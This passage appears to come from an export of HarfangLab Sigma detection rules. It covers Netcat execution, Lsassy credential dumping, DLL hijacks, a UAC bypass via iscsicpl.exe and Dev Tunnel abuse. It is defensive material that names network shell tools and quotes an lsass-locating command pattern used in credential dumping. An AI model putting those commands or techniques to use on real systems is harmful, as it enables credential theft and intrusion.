b3b207dfab2f429cc352ba125be32a0cae69fe4bf8563ab7d0128bba8c57a71c\n - '7a32d32e9e610798ffcc78ea47c7ccd1' # 17fdce691a410a4aad31b1b64a21c7f623fcf5ff31cd79b32171d3e5702b8b2d\n - 'cdc279a12c6a556c25ba7b0510c2b96e' # nc64.exe - ce80b839411b1541d09b0ede82f1477b516da0c60760079f46ba4443e1a6f419\n - '3d6493323c69a48467d0f9eeec5c2634' # 848a5ca5db9146592ba263d651d957d84c1389059d6a44a456c56e0b6ae2ee74\n - Description|contains: 'NetCat' # https://github.com/diegocr/netcat and https://github.com/vinsworldcom/NetCat64\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98269cb0-6fe3-4fda-85c3-84a45160ad01",
"rule_name": "Netcat Execution (Windows)",
"rule_description": "Detects the execution of Netcat (netcat.exe, nc.exe), a networking utility used for reading and writing data across network connections.\nThe detection relies on known import hashes and on the binary's file description rather than on its file name, so renamed copies are covered as well.\nNetcat is often abused by attackers for malicious activities such as establishing reverse shells, data transfer, and lateral movement within a network.\nIt is recommended to investigate the process executing Netcat, to analyze the command-line arguments for suspicious patterns, to review the network traffic originating from the system, and to check for any unauthorized access or credentials exposure.\nAdditionally, ensure that Netcat is being used for legitimate purposes.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-02-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1049",
"attack.t1095"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98991f0a-b80a-4401-809d-cd262444c4f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606379Z",
"creation_date": "2026-03-23T11:45:34.606382Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606390Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Hackndo/lsassy/",
"https://attack.mitre.org/techniques/T1003/"
],
"name": "t1003_lsassy.yml",
"content": "title: Windows Credentials Dumped via Lsassy\nid: 98991f0a-b80a-4401-809d-cd262444c4f1\ndescription: |\n Detects Windows credentials being dumped using the Lsassy tool.\n Lsassy is a tool intended to ease Windows credentials dumping by implementing multiple methods using different tools.\n It is recommended to identify the source of the remote connection using authentication logs and:\n - Investigate if the IP is involved in further actions on the same host or on different hosts;\n - Check if the user involved in the alert has made other suspicious activity;\n - Launch investigation on the source machine.\nreferences:\n - https://github.com/Hackndo/lsassy/\n - https://attack.mitre.org/techniques/T1003/\ndate: 2024/01/25\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.Lsassy\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\cmd.exe'\n ProcessImage|endswith: '\\cmd.exe'\n CommandLine|contains:\n - \"for /f *tokens=2 delims= *%J in ('*tasklist /fi *Imagename eq lsass.ex* | *find *lsass*') do\"\n - \"for /f *tokens=1,2 delims= *%A in ('*tasklist /fi *Imagename eq lsass.ex* | *find *lsass*') do\"\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98991f0a-b80a-4401-809d-cd262444c4f1",
"rule_name": "Windows Credentials Dumped via Lsassy",
"rule_description": "Detects Windows credentials being dumped using the Lsassy tool.\nLsassy is a tool intended to ease Windows credentials dumping by implementing multiple methods using different tools.\nIt is recommended to identify the source of the remote connection using authentication logs and:\n - Investigate if the IP is involved in further actions on the same host or on different hosts;\n - Check if the user involved in the alert has made other suspicious activity;\n - Launch investigation on the source machine.\n",
"rule_creation_date": "2024-01-25",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98a31d66-350a-4f80-b72f-5d09cae9b0b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601814Z",
"creation_date": "2026-03-23T11:45:34.601817Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601825Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_certenrollctrl.yml",
"content": "title: DLL Hijacking via EnrollComServer.exe\nid: 98a31d66-350a-4f80-b72f-5d09cae9b0b1\ndescription: |\n Detects potential Windows DLL Hijacking via EnrollComServer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\n The alert fires when a Microsoft-signed EnrollComServer.exe loads a certenroll.dll that is located outside the Windows system directories and is not signed by Microsoft Windows.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EnrollComServer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\certenroll.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98a31d66-350a-4f80-b72f-5d09cae9b0b1",
"rule_name": "DLL Hijacking via EnrollComServer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EnrollComServer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting a malicious DLL in the same folder.\nThe alert fires when a Microsoft-signed EnrollComServer.exe loads a certenroll.dll that is located outside the Windows system directories and is not signed by Microsoft Windows.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98efda1d-a62f-43c8-95b7-45d3c6d579ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294506Z",
"creation_date": "2026-03-23T11:45:35.294509Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294516Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://isc.sans.edu/diary/Njrat+Campaign+Using+Microsoft+Dev+Tunnels/31724/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_vs_code_tunnel_dns.yml",
"content": "title: Suspicious VSCode Tunnel DNS Request\nid: 98efda1d-a62f-43c8-95b7-45d3c6d579ee\ndescription: |\n Detects a non-standard process performing DNS resolution requests to Microsoft Dev Tunnel domains.\n Since July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\n Threat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\n This detection focuses on identifying Dev Tunnel usage initiated by unexpected or unauthorized processes rather than legitimate developer tools (such as code.exe or code-server).\n It is recommended to investigate the actions performed by this process to determine its legitimacy.\nreferences:\n - https://isc.sans.edu/diary/Njrat+Campaign+Using+Microsoft+Dev+Tunnels/31724/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - '.tunnels.api.visualstudio.com'\n - '.devtunnels.ms'\n\n filter_vscode:\n - ProcessImage|endswith:\n - '\\code-tunnel.exe'\n - '\\Code - Insiders.exe'\n - '\\Code.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n - ProcessOriginalFileName: 'electron.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft 
Corporation'\n\n filter_visualstudio:\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Enterprise\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Dotnet.x64\\ServiceHub.Host.dotnet.x64.exe\n # C:\\Program Files\\Microsoft Visual Studio\\18\\Community\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Extensibility.amd64\\DevHub.exe\n ProcessOriginalFileName:\n - 'ServiceHub.Host.dotnet.x64.dll'\n - 'DevHub.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n filter_browser:\n - ProcessOriginalFileName:\n - 'ChromiumPortable.exe'\n - 'YandexBrowser.exe' # Chromium Based Browsers\n - 'yandex.exe'\n - 'iridium.exe'\n - 'chrome.exe'\n - 'chromium.exe'\n - '7star.exe'\n - '7xing.exe'\n - 'torch.exe'\n - 'chromeplus.exe'\n - 'kometa.exe'\n - 'amigo.exe'\n - 'brave.exe'\n - 'centbrowser.exe'\n - 'chedot.exe'\n - 'orbitum.exe'\n - 'sputnik.exe'\n - 'dragon.exe'\n - 'vivaldi.exe'\n - 'citrio.exe'\n - '360chrome.exe'\n - 'uran.exe'\n - 'liebao.exe'\n - 'elementsbrowser.exe'\n - 'epic.exe'\n - 'coccocbrowser.exe'\n - 'qipsurf.exe'\n - 'coowon.exe'\n - 'msedge.exe'\n - 'qqbrowser.exe'\n - 'firefox.exe' # Firefox Based Browsers\n - 'waterfox.exe'\n - 'palemoon.exe'\n - 'librewolf.exe'\n - 'basilisk.exe'\n - 'seamonkey.exe'\n - 'icedragon.exe'\n - 'zen.exe'\n - 'msedgewebview2.exe'\n - 'sidekick.exe'\n - ProcessDescription: 'Opera Internet Browser'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n 
exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_nexthink:\n ProcessOriginalFileName: 'nxtsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NEXThink S.A.'\n\n exclusion_fsecure:\n ProcessOriginalFileName: 'fshoster64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'WithSecure Oyj'\n\n exclusion_zsatunnel:\n ProcessOriginalFileName: 'ZSATunnel.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Zscaler, Inc.'\n\n exclusion_sentinelone:\n ProcessOriginalFileName: 'SentinelAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sentinelone, Inc.'\n\n exclusion_kaspersky:\n ProcessOriginalFileName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n exclusion_iisexpress:\n ProcessImage: '?:\\Program Files\\IIS Express\\iisexpress.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_trustlane:\n ProcessImage: '?:\\Program Files\\trustlane\\trustlane_authentication_agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Olfeo SAS'\n\n exclusion_opera:\n ProcessDescription: 'Opera GX Internet Browser'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98efda1d-a62f-43c8-95b7-45d3c6d579ee",
"rule_name": "Suspicious VSCode Tunnel DNS Request",
"rule_description": "Detects a non-standard process performing DNS resolution requests to Microsoft Dev Tunnel domains.\nSince July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\nThreat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\nThis detection focuses on identifying Dev Tunnel usage initiated by unexpected or unauthorized processes rather than legitimate developer tools (such as code.exe or code-server).\nIt is recommended to investigate the actions performed by this process to determine its legitimacy.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9960b6cd-823d-45d5-ba7a-6ee09be5d019",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072131Z",
"creation_date": "2026-03-23T11:45:34.072134Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072138Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://windows-internals.com/faxing-your-way-to-system/",
"https://github.com/ionescu007/faxhell",
"https://borncity.com/win/2020/05/14/windows-print-spooler-exploit-fr-cve-2020-1048/"
],
"name": "t1574_001_persistence_dll_hijack_fax_ualapi.yml",
"content": "title: Fax Service DLL Hijack Detected\nid: 9960b6cd-823d-45d5-ba7a-6ee09be5d019\ndescription: |\n Detects the execution of a DLL hijack of the Fax service, which natively tries to load the non-existent ualapi.dll DLL from the System32 directory.\n This DLL can be planted by exploiting CVE-2020-1048 / CVE-2020-1337 (aka Faxhell).\n It is recommended to investigate the process that dropped the DLL into the System32 directory, as well as to analyze the loaded DLL to look for malicious content.\nreferences:\n - https://windows-internals.com/faxing-your-way-to-system/\n - https://github.com/ionescu007/faxhell\n - https://borncity.com/win/2020/05/14/windows-print-spooler-exploit-fr-cve-2020-1048/\ndate: 2020/10/02\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\ualapi.dll'\n Image|endswith: '\\fxssvc.exe'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9960b6cd-823d-45d5-ba7a-6ee09be5d019",
"rule_name": "Fax Service DLL Hijack Detected",
"rule_description": "Detects the execution of a DLL hijack of the Fax service, which natively tries to load the non-existent ualapi.dll DLL from the System32 directory.\nThis DLL can be planted by exploiting CVE-2020-1048 / CVE-2020-1337 (aka Faxhell).\nIt is recommended to investigate the process that dropped the DLL into the System32 directory, as well as to analyze the loaded DLL to look for malicious content.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9963d7f5-15c6-4511-91d7-ac2beed21c1d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089586Z",
"creation_date": "2026-03-23T11:45:34.089588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089592Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/",
"https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_load_macos.yml",
"content": "title: Suspicious Extensions Loaded by Chrome-based Browser (macOS)\nid: 9963d7f5-15c6-4511-91d7-ac2beed21c1d\ndescription: |\n Detects a Chrome-based browser launched with a specific argument that permits loading extensions from a specific folder.\n Adversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\n It is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/\n - https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/30\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n CommandLine|re: '--load-extension=[^ ]'\n ProcessParentImage: '/sbin/launchd'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9963d7f5-15c6-4511-91d7-ac2beed21c1d",
"rule_name": "Suspicious Extensions Loaded by Chrome-based Browser (macOS)",
"rule_description": "Detects a Chrome-based browser launched with a specific argument that permits loading extensions from a specific folder.\nAdversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\nIt is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\n",
"rule_creation_date": "2024-10-30",
"rule_modified_date": "2025-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99813d1f-9698-4995-907d-141014a3ed6f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595185Z",
"creation_date": "2026-03-23T11:45:34.595188Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595196Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iscsicpl.yml",
"content": "title: UAC Bypass via iscsicpl.exe\nid: 99813d1f-9698-4995-907d-141014a3ed6f\ndescription: |\n Detects a potential User Account Control bypass exploiting Windows DLL search order hijacking via iscsicpl.exe.\n The iscsicpl.exe binary is configured to auto-elevate privileges and is vulnerable to DLL search order hijacking when the 32-bit Microsoft binary is run on a 64-bit system via SysWOW64.\n This 32-bit binary will search the user's PATH for the DLL iscsiexe.dll.\n It is recommended to check for malicious behavior from processes modifying HKCU\\Environment\\Path and any parents of iscsicpl.exe. You should also investigate the activity of any iscsicpl.exe child processes.\nreferences:\n - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iscsicpl.exe'\n ImageLoaded|endswith: '\\iscsiexe.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99813d1f-9698-4995-907d-141014a3ed6f",
"rule_name": "UAC Bypass via iscsicpl.exe",
"rule_description": "Detects a potential User Account Control bypass exploiting Windows DLL search order hijacking via iscsicpl.exe.\nThe iscsicpl.exe binary is configured to auto-elevate privileges and is vulnerable to DLL search order hijacking when the 32-bit Microsoft binary is run on a 64-bit system via SysWOW64.\nThis 32-bit binary will search the user's PATH for the DLL iscsiexe.dll.\nIt is recommended to check for malicious behavior from processes modifying HKCU\\Environment\\Path and any parents of iscsicpl.exe. You should also investigate the activity of any iscsicpl.exe child processes.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9994e158-8140-4487-9d9d-7fd096b4b4bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070525Z",
"creation_date": "2026-03-23T11:45:34.070527Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070535Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thehackernews.com/2023/12/new-poolparty-process-injection.html",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_poolparty_process_access.yml",
